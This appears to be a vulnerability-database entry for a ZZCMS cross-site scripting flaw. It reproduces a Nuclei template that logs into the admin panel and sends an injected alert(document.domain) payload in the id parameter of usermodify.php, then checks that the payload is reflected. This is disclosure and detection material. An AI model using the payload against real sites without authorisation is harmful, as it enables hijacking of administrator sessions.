zzcms-xss: ZZCMS - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: ZZCMS | POC: 已公开

漏洞描述

ZZCMS contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.

PoC代码[已公开]

id: zzcms-xss

info:
  name: ZZCMS - Cross-Site Scripting
  author: ritikchaddha
  severity: high
  description: ZZCMS contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://github.com/JcQSteven/blog/issues/20
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
  tags: zzcms,xss,authenticated,vuln

http:
  - raw:
      - |
        POST /admin/logincheck.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        admin={{username}}&pass={{password}}
      - |
        GET /admin/usermodify.php?id=1%22%2balert(document.domain)%2b%22 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains(header_2, 'text/html')"
          - "status_code_2 == 200"
          - 'contains(body_2, "参数 1\"+alert(document.domain)+")'
        condition: and
# digest: 4a0a00473045022046fd8bcb756a4a7c4ff482de89563f37ef7dcacbaf1c02bfc9d738de95e8484a0221009206db34650a5362e566049ca80200444f1f25e9b654aa472cdb2b08256e6fee:922c64590222798bb761d5b6d8e72950

相关漏洞推荐